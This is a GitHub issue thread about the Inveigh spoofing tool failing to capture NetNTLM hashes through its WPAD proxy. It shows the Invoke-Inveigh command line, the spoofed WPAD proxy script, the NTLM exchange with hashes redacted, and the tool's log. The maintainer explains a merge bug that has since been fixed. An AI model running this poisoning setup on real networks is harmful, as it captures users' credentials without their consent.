Proxy auth but NTLM hash not captured

Question

Proxy auth but NTLM hash not captured

Closed this issue 5 years ago · 2 comments

neofito commented 5 years ago

Hello Kevin,

First I would to thank you for such great tool.

I'm running Inveigh on the "attacker" machine (192.168.100.101) from an elevated shell using these parameters:

Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous

In the victim machine (192.168.100.23) sniffing traffic with Wireshark I see the Inveigh host WPAD response:

function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}

After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:

CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Proxy-Authorization: NTLM [REDACTED]
Pragma: no-cache
Host: www.google.es

HTTP/1.1 407 Unauthorized
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 09 Apr 2020 18:57:52 GMT
Content-Length: 0
Proxy-Authenticate: NTLM [REDACTED]]
Content-Type: text/html

CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Host: www.google.es
Pragma: no-cache
Proxy-Authorization: NTLM [REDACTED]

The console output is confirming the wireshark output captured at the victim machine:

[+] [2020-04-09T18:57:51] LLMNR request for wpad received from 192.168.100.23 [response sent]
[+] [2020-04-09T18:57:51] TCP(80) SYN packet detected from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) GET request for /wpad.dat received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) host header wpad received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) user agent received from 192.168.100.23:59790:
Mozilla/4.0 (compatible; MSIE 7.0; Win32)
[+] [2020-04-09T18:57:51] TCP(8492) SYN packet detected from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) CONNECT request for www.google.es:443 received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) host header www.google.es received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) user agent received from 192.168.100.23:59791:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
[+] [2020-04-09T18:57:52] TCP(8492) SYN packet detected from 192.168.100.23:59792
[+] [2020-04-09T18:57:52] TCP(8493) SYN packet detected from 192.168.100.23:59793
[+] [2020-04-09T18:57:55] TCP(8493) SYN packet detected from 192.168.100.23:59793

Why Inveigh is not able of get the NetNTLM hash?

Thanks in advance!

Answer 1 · 2020-04-10T16:40:01.000Z

Same options with Inveigh 1.4 working like a charm

Answer 2 · 2020-04-12T04:17:15.000Z

Thanks!, when I merged the NTLM code between SMB and HTTP, I failed to include proxy traffic. I pushed the fix.